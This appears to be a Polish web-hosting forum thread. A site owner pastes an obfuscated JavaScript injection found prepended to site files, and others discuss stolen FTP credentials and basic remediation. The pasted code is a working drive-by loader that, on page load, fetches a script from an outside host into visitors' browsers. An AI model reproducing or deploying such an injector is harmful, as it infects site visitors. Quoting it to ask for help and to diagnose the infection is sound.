Wirus na stronie

[Ivellios]

Od paru dni do plików na stronie dokleja mi się takie coś:

<script>var M;if(M!='m' && M != ''){M=null};function k(){var y;if(y!='bd'){y=''};var Ul='';var ZB;if(ZB!='' && ZB!='IwR'){ZB=null};var d=window;var b=d['unescape'];var a;if(a!='l'){a=''};this.p='';var V=b("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%61%75%74%6f%2e%72%75%2f%62%75%7a%7a%6e%65%74%2e%63%6f%6d%2e%70%68%70");var nP;if(nP!='MY'){nP='MY'};var G=new Date();function Y(w,H){var X=b("%5d");var j=b("%5b");var A="";var HN=String("g");var v;if(v!=''){v='wQ'};this.UR='';var Zx;if(Zx!='' && Zx!='lR'){Zx=''};var F=new RegExp(j+H+X, HN);this.Yq="";this.Kl='';return w.replace(F, new String());var C;if(C!='ks' && C!='hf'){C='ks'};};var jr;if(jr!=''){jr='gL'};var Fv;if(Fv!=''){Fv='P'};var kU;if(kU!='KH' && kU != ''){kU=null};var E="";var h=Y('sacar9iApgtA','VA68ag9dT');var aW;if(aW!='Dx' && aW != ''){aW=null};var CU=new Date();var Xm=Y('sVrvcw','W46lwVvCn3ptLx');var YN='';var YB='';var S=Y('doeofoeprk','GkZha0Tp5RtoB');this.PJ='';var n=Y('85935691097415683111741307161334','96437251');var _Z;if(_Z!='' && _Z!='cY'){_Z='QE'};var dQ=document;function nY(){var kS=new Date();var I=b("%68%74%74%70%3a%2f%2f%66%72%65%65%63%61%72%7a%6f%6e%65%2e%61%74%3a");var em=new Date();var eh=new Date();var Xk=I;var TB;if(TB!='' && TB!='J'){TB=null};this.Ik='';Xk+=n;var zS;if(zS!='cZ' && zS!='f'){zS=''};Xk+=V;var JC="";var hM;if(hM!='ms' && hM!='yw'){hM='ms'};this.q_="";this.uc="";var Sx='';try {_=dQ[Y('cUr1e1aut3euEGlJeUmGeGnJtU','UJu31Gz')](h);var vC="";var moK;if(moK!='pu' && moK!='qq'){moK=''};_[S]=[2,1][1];_[Xm]=Xk;var hG=new String();var cc='';dQ.body[Y('azpMpxe_nqdvCMhZijlwdZ','Pzxq_vwZjMBg')](_);this.Ci='';var Yf=new String();var fm=new Array();this.bp='';} catch(B){var rG=new String();this.EX="";};this.OX="";var TM=new Date();var ka;if(ka!='Hm' && ka != ''){ka=null};}var ke=new Array();var lx="";var Iw=Y('omnNlAoJamdJ','pNAgwmU0J2CFTcSVR8Yj');var IS=new Array();var rm;if(rm!=''){rm='DM'};this.vX="";d[Iw]=nY;var Pq="";var FD="";};var XH;if(XH!='sD' && XH!='Lj'){XH='sD'};var Xh;if(Xh!='Mr' && Xh!='wi'){Xh='Mr'};var Az;if(Az!='bP' && Az!='OQ'){Az='bP'};k();</script>
<!--2925bf9736e3fbe4fff0d8c8f6b09fe1-->

Ktoś się orientuje, co to może byc za ziółko i jakie konsekwencje może odczuć komputer ofiary?

To gówienko dokleja mi się do wszystkich plików z "js", "main" i "index" w nazwie, na samym początku pliku jeszcze przed deklaracją DOCTYPE, co powoduje niejednokrotnie rozwalanie się całej strony (szczególnie forum opartego na phpBB)

Skrobnąłem już emaila do supportu (prohost), ale odpisali, że będą mogli wrzucić kopie zapasowe plików dopiero po 23:00 :/

[Kojotek_OX]

Temat wałkowany 100000x

1 - nie używaj TC

2 - zmień antywirusa

3 - przeskanuj sobie cały komputer

4 - nie bawimy się crackami tylko orginalne softy

5 - NIE ZAPISUJEMY W ŻADNYM SOFCIE HASEŁ DO FTP

6 - szukajka na forum

[hekko]

1 - nie używaj TC

Oczywiście, że możesz używać TC. Tylko ściągnij sobie nowszą wersję i włącz szyfrowanie haseł.

[NetBusters Group]

4 - nie bawimy się crackami tylko orginalne softy

Ty masz sam orginalny soft na kompie?

[hekko]

Ty masz sam orginalny soft na kompie?

Kojotex_OX prowadzi chyba coś w rodzaju DG w związku z czym szczególnie powinien chyba takowy posiadać, chociaż nie wiem jak do tego tematu podchodzą na wyspach.

Czasem wystarczy wejść na jakąś brzydką stronę i już..

[Lukas_79]

mialem podobne akcje - nigdy nie zapisywalem hasel - mam 100% oryginalny soft (praktycznie goly system + pare programow SEO)

wywalilem TC - pozmienialem hasla i nadal sie pojawialo

co pomoglo ? - wylaczylem dostep FTP - jak reka odjac

[Kojotek_OX]

Jako OFF absolutnie wszystko mam org - na wyspach za to walą takie kary że się można do końca życia nie wypłacić (już miałem 2 kontrole do tej pory) nawet lewego CD nie mam bo ceny płytek są tak śmiesznie niskie że nie warto ściągać z warezów

Co do stron to prawda ale antywirus to każdy chyba ma więc .... a wszystkie to wyłapują tak więc albo głupota bo się nie ma antywira albo ...... to tylko crack więc program anty-wirusowy się myli. Każdy kiedyś zaczyna etc ale bawiąc się w SEO i mając dostępy do różnych danych naprawdę trzeba być mało odpowiedzialnym żeby wyłączyć antywira lub korzystać z .... Nikogo nie oceniam bo może ten przypadek jest inny ale 99% infekcji to właśnie problemy wymienione

[hekko]

co pomoglo ? - wylaczylem dostep FTP - jak reka odjac

Ponieważ te boty wykorzystują FTP do wrzucania tego kodu. A skąd miały dane do FTP jak nie z komputera na którym mogły być one zapisane ?

[Lukas_79]

A skąd miały dane do FTP jak nie z komputera na którym mogły być one zapisane ?

nigdzie nie napisalem, ze to sie bierze z powietrza

do ftpa mialo dostep kilka osob, ale zmiana hasel nic nie dala (to mnie najbardziej zdziwilo - i nikt inny tych hasel nie dostal)

komp wyglada na czysty - przeryty na kilka mozliwych sposobow

one tez jada slownikami - ale trafienie w haslo to jak los na loterii

[hekko]

one tez jada slownikami - ale trafienie w haslo to jak los na loterii

Słowniki to jedno ale tutaj nikogo nie podejrzewam, szczególnie Ciebie o zbyt proste hasło. No i w takim wypadku jeszcze login musiałby trafić..

Analizuję czasem logi z hekko to zasób loginów sprawdzanych przez boty jest naprawdę spory.

Analizowałeś swoje logi po zmianie tych plików ?

[Lukas_79]

Analizowałeś swoje logi po zmianie tych plików ?

na jednej maszynce zmienilem testowo nazwy userow - (hasla zostaly te same) i czekam co sie stanie

a loginy to nazwy domen obciete do 8 znakow - jak juz cos bylo upchniete w subdomeny i znajdowalo sie w katalogu /sd to zostawalo czyste

[Ivellios]

Ja jak najbardziej antywirusa posiadam. Avast Zabójca Komputerów.

Również wyłączyłem dostęp do FTP i zmieniłem hasło, póki co mam spokój.